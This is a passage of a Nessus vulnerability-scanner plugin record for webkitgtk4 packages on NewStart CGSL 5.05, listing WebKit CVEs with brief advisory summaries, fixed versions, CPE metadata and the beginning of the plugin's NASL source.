and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8835)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8844)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8846)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web content that allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash). (CVE-2020-11793)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17, iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS 13.3.1. A DOM object context may not have had a unique security origin. (CVE-2020-3864)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.\n (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 12.5.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30666)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30761)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30762)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-10-28T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.05 / MAIN 5.05 : webkitgtk4 Multiple Vulnerabilities (NS-SA-2021-0166)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8383", "CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902", "CVE-2021-30666", "CVE-2021-30761", "CVE-2021-30762"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:webkitgtk4-jsc", "p-cpe:/a:zte:cgsl_main:webkitgtk4-jsc-devel", "cpe:/o:zte:cgsl_main:5", "p-cpe:/a:zte:cgsl_core:webkitgtk4-doc", "p-cpe:/a:zte:cgsl_main:webkitgtk4-devel", "p-cpe:/a:zte:cgsl_main:webkitgtk4-doc", "cpe:/o:zte:cgsl_core:5", "p-cpe:/a:zte:cgsl_core:webkitgtk4-jsc-devel", "p-cpe:/a:zte:cgsl_core:webkitgtk4-devel", "p-cpe:/a:zte:cgsl_main:webkitgtk4", "p-cpe:/a:zte:cgsl_core:webkitgtk4", "p-cpe:/a:zte:cgsl_core:webkitgtk4-jsc"], "id": "NEWSTART_CGSL_NS-SA-2021-0166_WEBKITGTK4.NASL", "href": "https://www.tenable.com/plugins/nessus/154614", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0166. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154614);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-7285\",\n \"CVE-2019-7292\",\n \"CVE-2019-8503\",\n \"CVE-2019-8506\",\n \"CVE-2019-8515\",\n \"CVE-2019-8518\",\n \"CVE-2019-8523\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8625\",\n \"CVE-2019-8644\",\n \"CVE-2019-8649\",\n \"CVE-2019-8658\",\n \"CVE-2019-8666\",\n \"CVE-2019-8669\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8674\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8678\",\n \"CVE-2019-8679\",\n \"CVE-2019-8680\",\n \"CVE-2019-8681\",\n \"CVE-2019-8683\",\n \"CVE-2019-8684\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8688\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8707\",\n \"CVE-2019-8710\",\n \"CVE-2019-8719\",\n \"CVE-2019-8720\",\n \"CVE-2019-8726\",\n \"CVE-2019-8733\",\n \"CVE-2019-8735\",\n \"CVE-2019-8743\",\n \"CVE-2019-8763\",\n \"CVE-2019-8764\",\n \"CVE-2019-8765\",\n \"CVE-2019-8766\",\n \"CVE-2019-8768\",\n \"CVE-2019-8769\",\n \"CVE-2019-8771\",\n \"CVE-2019-8782\",\n \"CVE-2019-8783\",\n \"CVE-2019-8808\",\n \"CVE-2019-8811\",\n \"CVE-2019-8812\",\n \"CVE-2019-8813\",\n \"CVE-2019-8814\",\n \"CVE-2019-8815\",\n \"CVE-2019-8816\",\n \"CVE-2019-8819\",\n \"CVE-2019-8820\",\n \"CVE-2019-8821\",\n \"CVE-2019-8822\",\n \"CVE-2019-8823\",\n \"CVE-2019-8835\",\n \"CVE-2019-8844\",\n \"CVE-2019-8846\",\n \"CVE-2019-11070\",\n \"CVE-2020-3862\",\n \"CVE-2020-3864\",\n \"CVE-2020-3865\",\n \"CVE-2020-3867\",\n \"CVE-2020-3868\",\n \"CVE-2020-3885\",\n \"CVE-2020-3894\",\n \"CVE-2020-3895\",\n \"CVE-2020-3897\",\n \"CVE-2020-3899\",\n \"CVE-2020-3900\",\n \"CVE-2020-3901\",\n \"CVE-2020-3902\",\n \"CVE-2020-10018\",\n \"CVE-2020-11793\",\n \"CVE-2021-30666\",\n \"CVE-2021-30761\",\n \"CVE-2021-30762\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n\n script_name(english:\"NewStart CGSL CORE 5.05 / MAIN 5.05 : webkitgtk4 Multiple Vulnerabilities (NS-SA-2021-0166)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has webkitgtk4 packages installed that are\naffected by multiple vulnerabilities:\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings\n when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237,\n CVE-2019-8571, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain\n JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted\n URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-7285)\n\n - A validation issue was addressed with improved logic. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS\n 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web\n content may result in the disclosure of process memory. (CVE-2019-7292)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. A malicious website may be able to execute\n scripts in the context of another website. (CVE-2019-8503)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS\n 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - A cross-origin issue existed with the fetch API. This was addressed with improved input validation. This\n issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11.\n Processing maliciously crafted web content may disclose sensitive user information. (CVE-2019-8515)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8518, CVE-2019-8558,\n CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8523, CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2,\n tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may\n lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for\n Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for\n Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13,\n iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8644, CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679,\n CVE-2019-8680, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved\n state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes\n for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave\n 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud\n for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for\n Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8684, CVE-2019-8688,\n CVE-2019-8689)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state\n management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for\n Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726,\n CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud\n for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8766)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data\n deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history\n items. (CVE-2019-8768)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This\n issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website\n may reveal browsing history. (CVE-2019-8769)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1,\n iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2019-8771)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0,\n iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for\n Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS\n 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing\n maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows,\n iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8835)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3\n for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2019-8844)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3,\n iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for\n Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8846)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0)\n contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue\n has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web\n content that allows remote attackers to execute arbitrary code or cause a denial of service (memory\n corruption and application crash). (CVE-2020-11793)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1\n and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud\n for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17,\n iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS\n 13.3.1. A DOM object context may not have had a unique security origin. (CVE-2020-3864)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0,\n iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS\n 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for\n Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4,\n tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A\n file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS\n 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows\n 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows\n 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.\n (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and\n iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3,\n iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4\n and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for\n Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 12.5.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. (CVE-2021-30666)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. 